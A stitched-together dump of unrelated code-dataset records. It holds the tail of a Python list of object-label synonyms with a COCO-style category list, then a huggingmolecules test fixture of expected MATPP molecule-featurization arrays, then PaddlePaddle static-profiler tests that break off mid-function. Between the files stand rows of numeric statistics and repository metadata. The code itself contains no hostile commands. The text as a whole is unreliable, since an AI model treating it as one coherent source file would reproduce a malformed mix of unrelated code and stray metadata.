['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['chair', 'desk'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['potted plant', 'pot', 'flowerpot'],
['tv', 'pay-phone', 'pay-station'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', 'espresso maker'],
['tv', 'pay-phone', 'pay-station'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk']
]
sample_coco = ['Bag', 'backpack', 'handbag', 'suitcase', 'umbrella', 'tie', 'Animal', 'bird', 'cat', 'dog', 'horse',
'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'Food', 'banana', 'apple', 'orange', 'carrot',
'broccoli', 'cake', 'pizza', 'hot dog', 'donut', 'sandwich', 'Sports', 'tennis racket',
'badminton racket', 'baseball bat', 'kite', 'snowboard', 'ball', 'basketball', 'Furniture', 'chair',
'sofa', 'bed', 'toilet', 'couch', 'fridge', 'Office', 'keyboard', 'mouse', 'cellphone', 'tv', 'laptop',
'Miscellaneous', 'Book', 'clock']
| 28.565457
| 118
| 0.450936
| 2,670
| 25,966
| 4.367416
| 0.071536
| 0.126404
| 0.154875
| 0.254438
| 0.88037
| 0.877283
| 0.862447
| 0.813224
| 0.804048
| 0.773347
| 0
| 0.023176
| 0.305399
| 25,966
| 908
| 119
| 28.596916
| 0.623364
| 0.040014
| 0
| 0.705426
| 0
| 0
| 0.410552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001107
| 0
| 0.001107
| 0.001107
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5016d1df201c0d351f9a0f4f658ee86148e5e6de
| 19,469
|
py
|
Python
|
src/tests/featurization/expected/featurization_expected_matpp.py
|
panpiort8/huggingmolecules-1
|
7caf9bb355db86a0d0e8423088c4328770b4db0d
|
[
"Apache-2.0"
] | 1
|
2021-11-04T03:06:08.000Z
|
2021-11-04T03:06:08.000Z
|
src/tests/featurization/expected/featurization_expected_matpp.py
|
gabegomes/huggingmolecules
|
adc581c97fbc21d9967dd9334afa94b22fb77651
|
[
"Apache-2.0"
] | null | null | null |
src/tests/featurization/expected/featurization_expected_matpp.py
|
gabegomes/huggingmolecules
|
adc581c97fbc21d9967dd9334afa94b22fb77651
|
[
"Apache-2.0"
] | null | null | null |
from huggingmolecules.featurization.featurization_matpp import MatppBatchEncoding, MatppMoleculeEncoding
from numpy.ma import array
from torch import FloatTensor
expected_encoded_smiles = [
MatppMoleculeEncoding(
node_features=array([[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.]]),
bond_features=array([[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]),
distance_matrix=array([[1.00000000e+06, 1.00000000e+06, 1.00000000e+06, 1.00000000e+06, 1.00000000e+06],
[1.00000000e+06, 0.00000000e+00, 1.49726307e+00, 2.46955644e+00, 3.85851083e+00],
[1.00000000e+06, 1.49726307e+00, 0.00000000e+00, 1.33899508e+00, 2.46955692e+00],
[1.00000000e+06, 2.46955644e+00, 1.33899508e+00, 0.00000000e+00, 1.49726303e+00],
[1.00000000e+06, 3.85851083e+00, 2.46955692e+00, 1.49726303e+00, 0.00000000e+00]]),
relative_matrix=array([[[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 1., 0.],
[0., 0., 1., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 1., 1., 1., 1.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.]]]),
y=None),
MatppMoleculeEncoding(
node_features=array([[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.]]),
bond_features=array([[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 1.],
[0., 1., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]]]),
distance_matrix=array([[1.00000000e+06, 1.00000000e+06, 1.00000000e+06],
[1.00000000e+06, 0.00000000e+00, 1.21945472e+00],
[1.00000000e+06, 1.21945472e+00, 0.00000000e+00]]),
relative_matrix=array([[[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]],
[[0., 0., 0.],
[0., 0., 1.],
[0., 1., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 1., 1.],
[1., 0., 0.],
[1., 0., 0.]]]), y=None)]
expected_batch = MatppBatchEncoding(
node_features=FloatTensor([[[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]]]),
bond_features=FloatTensor([[[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]],
[[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]]),
relative_matrix=FloatTensor([[[[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 1., 0.],
[0., 0., 1., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 1., 1., 1., 1.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.]]],
[[[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 1., 1., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]]),
distance_matrix=FloatTensor([[[1.0000e+06, 1.0000e+06, 1.0000e+06, 1.0000e+06, 1.0000e+06],
[1.0000e+06, 0.0000e+00, 1.4973e+00, 2.4696e+00, 3.8585e+00],
[1.0000e+06, 1.4973e+00, 0.0000e+00, 1.3390e+00, 2.4696e+00],
[1.0000e+06, 2.4696e+00, 1.3390e+00, 0.0000e+00, 1.4973e+00],
[1.0000e+06, 3.8585e+00, 2.4696e+00, 1.4973e+00, 0.0000e+00]],
[[1.0000e+06, 1.0000e+06, 1.0000e+06, 0.0000e+00, 0.0000e+00],
[1.0000e+06, 0.0000e+00, 1.2195e+00, 0.0000e+00, 0.0000e+00],
[1.0000e+06, 1.2195e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00],
[0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00],
[0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]]]),
y=None, batch_size=2)
| 52.618919
| 120
| 0.162823
| 2,164
| 19,469
| 1.457024
| 0.020795
| 0.999049
| 1.384396
| 1.697431
| 0.84491
| 0.805899
| 0.798605
| 0.78687
| 0.783698
| 0.762766
| 0
| 0.325349
| 0.59474
| 19,469
| 369
| 121
| 52.761518
| 0.074271
| 0
| 0
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009524
| 0
| 0.009524
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
5029d73929e9e346f38fbf7674758de36780c750
| 9,578
|
py
|
Python
|
framework_api/test_static_profiler.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 14
|
2020-03-04T07:52:07.000Z
|
2022-02-14T01:39:14.000Z
|
framework_api/test_static_profiler.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 19
|
2020-03-04T03:52:10.000Z
|
2021-12-23T07:02:07.000Z
|
framework_api/test_static_profiler.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 26
|
2020-03-04T05:39:09.000Z
|
2022-02-14T01:43:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test static profiler."""
import paddle.fluid as fluid
import paddle.fluid.profiler as profiler
import numpy as np
import os
def test_profiler():
"""
test profiler
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with profiler.profiler('CPU', 'total', './profile') as prof:
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
if os.path.exists("./profile"):
assert True
else:
assert False
def test_profiler1():
"""
test profiler with sorted_key = 'total', 'calls', 'max', 'min', 'ave'
:return:
"""
sorted_key = 'calls'
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with profiler.profiler('CPU', sorted_key, './profile') as prof:
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler():
"""
test start_profiler
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('CPU')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler1():
"""
test start_profiler state=GPU
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('GPU')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler2():
"""
test start_profiler state=All
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(
main_program=main_program, startup_program=startup_program):
profiler.start_profiler('All')
epoc = 30
dshape = [4, 3, 28, 28]
data = fluid.layers.data(
name='data', shape=[3, 28, 28], dtype='float32')
conv = fluid.layers.conv2d(
data, 20, 3, stride=[1, 1], padding=[1, 1])
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for i in range(epoc):
input = np.random.random(dshape).astype('float32')
exe.run(fluid.default_main_program(), feed={'data': input})
# for iter in range(10):
# if iter == 2:
# profiler.reset_profiler()
# except each iteration
profiler.stop_profiler('total', './profile')
if os.path.exists("./profile"):
assert True
else:
assert False
def test_start_profiler3():
"""
test start_profiler state=nothing
:return:
"""
if os.path.exists("./profile"):
os.remove("./profile")
main_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
